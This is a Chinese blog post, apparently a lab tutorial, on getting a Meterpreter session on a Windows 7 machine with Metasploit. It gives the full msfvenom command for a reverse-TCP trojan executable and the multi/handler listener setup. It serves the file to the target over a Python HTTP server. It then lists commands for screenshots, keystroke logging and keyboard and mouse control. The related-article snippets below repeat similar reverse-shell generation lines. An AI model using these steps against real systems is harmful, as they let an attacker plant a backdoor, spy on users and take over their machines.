msf 获取一个普通的session 控制windows

最新推荐文章于 2024-02-29 16:28:30 发布
最新推荐文章于 2024-02-29 16:28:30 发布
阅读量2.6k 收藏 3
点赞数 1
分类专栏: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44286136/article/details/115865976
版权

msf 获取session

在kali终端中打开msfconsole控制台
开启监听
use exploit/multi/handler
设置tcp监听
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
再次开启一个终端进行(shift+ctrl+T),查看本机ip
利用msfvenom制作木马程序
说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-f exe 生成exe格式

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.27.7.10 lport=4444 -f exe >/tmp/hack.exe

在这里插入图片描述
将木马传到目标主机
这里使用python -m SimpleHTTPServer 800搭建一个http服务,提供一个文件浏览的web页面到800端口
在这里插入图片描述
打开目标机win7,输入地址进行下载木马并保存在桌面
在这里插入图片描述

下载过程 回显
在这里插入图片描述

返回第二步界面,设置监听主机,运行
在这里插入图片描述
在win7中打开msf.exe木马文件,再次查看msf控制台
在这里插入图片描述

可以看到得了session
11.查看session,如果此时是meterpreter,输入background即可返回msf exploit(multi/handler)
查看系统信息:sysinfo
截取时下桌面:screenshot
在这里插入图片描述

捕获击键记录:keyscan start
控制键盘鼠标 启用/禁用:uictl enable/disable keyboard

营长s
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSFsessions命令使用
qq_44624916的博客
11-28 5258
MSF使用
MSF基本使用
浅笑996的博客
11-10 2625
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4543
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
msf学习笔记
qq_48257021的博客
12-20 1070
SMB(服务器消息快):TCP445、NBT间接用TCP139接收数据,MS10-012、MS10-054 MSRPC(微软远程过程调用):TCP139、445,MS05-039、MS09-026、-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。-t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20。
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
" 这句话强调了这个Windows版本的MSFconsole在资源获取上可能较为困难,表明它对于渗透测试者和安全研究人员来说是一个宝贵的工具。 **标签解析:** - **渗透测试**:渗透测试是一种安全评估方法,通过模拟黑客攻击...
71-71.渗透测试-Windows安装msf.mp4
最新发布
05-10
71-71.渗透测试-Windows安装msf.mp4
第九十七课:msf配置自定义payload控制目标主机权限1
08-03
在payload选项中,我们关注的是`windows/meterpreter/reverse_tcp`,这是一个常见的Meterpreter回连payload,它会在目标主机上建立一个反向连接到攻击机。这里需要设置: 1. `LHOST`:攻击机的监听IP地址,`192.168...
msf的一次简单测试 可以看看
03-18
msf我想没人不知道吧 这个是一个msf的小测试 视频不知道丢哪了
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 1812
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
Metasploit(一)--Meterpreter的命令速查表
weixin_34167819的博客
08-27 847
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 1363
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
Metasploit基本使用及常见漏洞复现
BeatRex的博客
09-20 1519
一、数据库配置 第一次打开msf的时候会报错,显示无法连接数据库等错误信息,所以需要配置下数据库postgresql 步骤: 开启postgresql服务service postgresql start,然后查看下postgresql数据库的状态service postgresql status显示已经开启成功; 创建和初始化msf数据库msfdb init; 启动msfmsfconsol...
利用beef和msf实现session远程命令
居上
10-24 566
笔记beef启动 beef 的方法msf beef 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 的方法 1.beef-xss 2./usr/share/beef-xss/beef (使用前需要修改默认的用户名称和密码) Web 管理界面 http://127.0.0.1:3000/ui/panel Shellcode http://127.0.0.1:3000/hook.js 测试页面 http://127.0.0.1:3000/demos/butch
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
Metasploit Framework(MSF)的使用
热门推荐
谢公子的博客
03-01 2万+
目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010(永恒之蓝) Auxiliary辅助探测模块 Exploit漏洞利用模块 Payload攻击载荷模块 后渗透阶段 Post后渗透模块 查看主机是否运行在虚拟机上 关闭杀毒...
20145212 罗天晨 MSF基础应用
weixin_30256505的博客
04-11 116
一、对exploit,payload,encode的理解 exploit是利用系统漏洞,相当于一个动态的过程。 payload是攻击载荷,用于实现对漏洞的攻击,是实现漏洞攻击最核心的代码。 encode是用于实验特征码伪装的编码,可以实现免杀。 二、实验感想 这次实验运用不同的漏洞进行了攻击,其中比较纠结的攻击就是IE浏览器攻击和最后一个辅助模块的攻击。因为之前老师给出的windowsXP靶机...
msf windows
09-02
msf windows版是Metasploit Framework在Windows操作系统上的版本。你可以在默认安装目录C:\metasploit-framework\bin中找到安装文件。安装Metasploit Framework可以使用Windows木马生成工具msfvenom,生成一个Windows平台的木马程序,然后在攻击机上运行该木马程序。例如,使用以下命令生成一个反向TCP连接的Meterpreter木马程序,并保存到C:\tool\shell.exe文件中:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP地址LPORT=10000 -f exe > C:\tool\shell.exe<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值